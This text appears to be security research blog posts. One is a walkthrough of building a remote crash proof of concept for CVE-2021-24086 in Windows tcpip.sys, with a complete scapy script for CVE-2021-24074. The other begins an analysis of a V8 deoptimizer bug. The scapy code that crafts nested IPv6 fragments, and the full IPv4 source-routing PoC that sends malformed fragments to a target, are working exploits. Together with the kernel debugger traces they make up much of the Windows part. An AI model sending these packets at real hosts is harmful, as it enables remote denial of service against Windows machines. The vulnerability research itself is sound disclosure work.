Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.

What I started to do at this point is to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically so I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Morale of the day: don't leave any rocks unturned, follow your intuitions and reach the state of no unknowns.

trigger

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft own's @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way there you should join and come hang in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the Poc I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()

Modern attacks on the Chrome browser : optimizations and deoptimizations

Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through it's JavaScript engine.

One of the topics I've been playing with at that time was deoptimization and so I discussed, among others, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

Motivation

The commit

To understand this security bug, it is necessary to delve into V8's internals.

Let's start with what the commit says:

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1873692
Reviewed-by: Georg Neis <[email protected]>
Commit-Queue: Nico Hartmann <[email protected]>
Cr-Commit-Position: refs/heads/master@{#64469}

It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
         // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
         // truncated BigInts.
         if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
         }

         (*types)[i] =
@@ -1220,11 +1220,22 @@
     // Accumulator is a special flower - we need to remember its type in
     // a singleton typed-state-values node (as if it was a singleton
     // state-values node).
+    Node* accumulator = node->InputAt(2);
     if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
     } else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
       Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
       if (accumulator == jsgraph_->OptimizedOutConstant()) {
         node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
       } else {
@@ -1237,7 +1248,7 @@
         node->ReplaceInput(
             2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                               types, SparseInputMask::Dense()),
-                                          accumulator));
+                                          node->InputAt(2)));
       }
     }

This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1876057
Commit-Queue: Nico Hartmann <[email protected]>
Auto-Submit: Nico Hartmann <[email protected]>
Reviewed-by: Jakob Gruber <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#64738}
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
  let y = BigInt.asUintN(64, 15n);
  // Introduce a side effect to force the construction of a FrameState that
  // captures the value of y.
  g = 42;
  try {
    return x + y;
  } catch(_) {
    return y;
  }
}


%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);

Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

Because after a deoptimizaton execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: what ignition registers?). To do that, the deoptimizer uses those deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

Internals

To understand this bug, we want to know:

  • what is ignition (because we deoptimize back to ignition)
  • what is simplified lowering (because that's where the bug is)
  • what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

Ignition

Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means opcode's inputs and output are using only registers. There is an accumulator used as an implicit operand for many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
  let value = val + 42;
  o.x = value;
}
opt_me({x:1.1});

Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
   13 E> 0000017DE515F366 @    0 : a5                StackCheck
   41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
   45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
         0000017DE515F36C @    6 : 26 fb             Star r0
   53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
   57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
         0000017DE515F374 @   14 : 0d                LdaUndefined
   67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
 - map: 0x00d580740789 <Map>
 - length: 1
           0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)

Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
 - map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0000004B05BFE830

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10

This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
 - code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...

Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src\codegen\x64\register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
  // handler at the current bytecode offset.
  Label do_dispatch;
  __ bind(&do_dispatch);
  __ Move(
      kInterpreterDispatchTableRegister,
      ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
  __ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  __ movq(kJavaScriptCallCodeStartRegister,
          Operand(kInterpreterDispatchTableRegister, r11,
                  times_system_pointer_size, 0));
  __ call(kJavaScriptCallCodeStartRegister);
  masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

  // Any returns to the entry trampoline are either due to the return bytecode
  // or the interpreter tail calling a builtin and then a dispatch.

  // Get bytecode array and bytecode offset from the stack frame.
  __ movq(kInterpreterBytecodeArrayRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
  __ movq(kInterpreterBytecodeOffsetRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
  __ SmiUntag(kInterpreterBytecodeOffsetRegister,
              kInterpreterBytecodeOffsetRegister);

  // Either return, or advance to the next bytecode and dispatch.
  Label do_return;
  __ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  AdvanceBytecodeOffsetOrReturn(masm, kInterpreterBytecodeArrayRegister,
                                kInterpreterBytecodeOffsetRegister, rbx, rcx,
                                &do_return);
  __ jmp(&do_dispatch);

Ignition handlers

Ignitions handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
  Node* accumulator = GetAccumulator();
  Node* relative_jump = BytecodeOperandUImmWord(0);
  CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
  CSA_ASSERT(this, IsBoolean(accumulator));
  JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}

Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}
void BinaryOpWithFeedback(BinaryOpGenerator generator) {
    Node* lhs = LoadRegisterAtOperandIndex(0);
    Node* rhs = GetAccumulator();
    Node* context = GetContext();
    Node* slot_index = BytecodeOperandIdx(1);
    Node* maybe_feedback_vector = LoadFeedbackVector();

    BinaryOpAssembler binop_asm(state());
    Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
                                          maybe_feedback_vector, false);
    SetAccumulator(result);
    Dispatch();
}

From this code, we understand that when executing AddSmi [42], [0], V8 ends-up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left hand side of the addition is the operand 0 ([42] in this case), the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.

It is interesting to point out to observe the call to Dispatch. We may expect that every handler is called from within the do_dispatch label of InterpreterEntryTrampoline whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to the do_dispatch)

Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition to true and recompile the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

  • --trace-ignition
  • --trace_feedback_updates

There are also a few interesting runtime functions:

  • Runtime_InterpreterTraceBytecodeEntry
    • prints ignition registers before executing an opcode
  • Runtime_InterpreterTraceBytecodeExit
    • prints ignition registers after executing an opcode
  • Runtime_InterpreterTraceUpdateFeedback
    • displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
    return a + b;
}

We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
      [          r2 -> 0x3ede813004a9 <undefined> ]
      [          r3 -> 42 ]
      [          r4 -> 1 ]
 -> 0x193680a1fa56 @    0 : a5                StackCheck 
 -> 0x193680a1fa57 @    1 : 25 02             Ldar a1
      [          a1 -> 1 ]
      [ accumulator <- 1 ]
 -> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
      [ accumulator -> 1 ]
      [          a0 -> 42 ]
      [ accumulator <- 43 ]
 -> 0x193680a1fa5c @    6 : a9                Return 
      [ accumulator -> 43 ]
 -> 0x193680a1f83a @   36 : 26 fb             Star r0
      [ accumulator -> 43 ]
      [          r0 <- 43 ]
